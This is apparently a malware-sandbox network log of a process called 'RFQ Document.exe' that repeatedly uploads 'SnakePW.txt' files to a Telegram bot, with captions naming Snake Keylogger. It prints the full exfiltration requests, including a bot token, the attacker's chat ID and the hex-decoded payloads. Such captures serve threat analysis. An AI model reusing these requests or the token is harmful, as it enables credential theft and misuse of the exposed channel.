{"ok":true,"result":{"message_id":12638,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808714,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.4	49833	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:34 UTC	91	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ca18e239 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:34 UTC	91	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 31 38 65 32 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ca18e239Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:34 UTC	91	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:34 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:34 UTC	92	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12639,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808714,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.4	49834	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:34 UTC	92	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ca37e243 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:34 UTC	93	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 33 37 65 32 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ca37e243Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:34 UTC	93	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:34 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:34 UTC	93	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12640,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808714,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.4	49835	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:34 UTC	94	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ca4fb70b Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:34 UTC	94	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 34 66 62 37 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ca4fb70bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:35 UTC	95	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:35 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:35 UTC	95	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12641,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808714,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49780	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:21 UTC	9	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c288eef3 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:21 UTC	9	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 38 38 65 65 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c288eef3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:21 UTC	10	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:21 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:21 UTC	10	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12585,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808701,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.4	49836	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:35 UTC	95	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ca6eb568 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:35 UTC	96	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 36 65 62 35 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ca6eb568Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:35 UTC	96	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:35 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:35 UTC	97	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12642,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808715,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.4	49837	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:35 UTC	97	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ca8b52f6 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:35 UTC	97	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 38 62 35 32 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ca8b52f6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:35 UTC	98	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:35 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:35 UTC	98	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12643,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808715,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.4	49838	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:35 UTC	99	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255caa329fb Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:35 UTC	99	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 61 33 32 39 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255caa329fbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:35 UTC	99	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:35 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:35 UTC	100	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12644,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808715,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.4	49839	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:35 UTC	100	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cac2278a Host: api.telegram.org Content-Length: 407
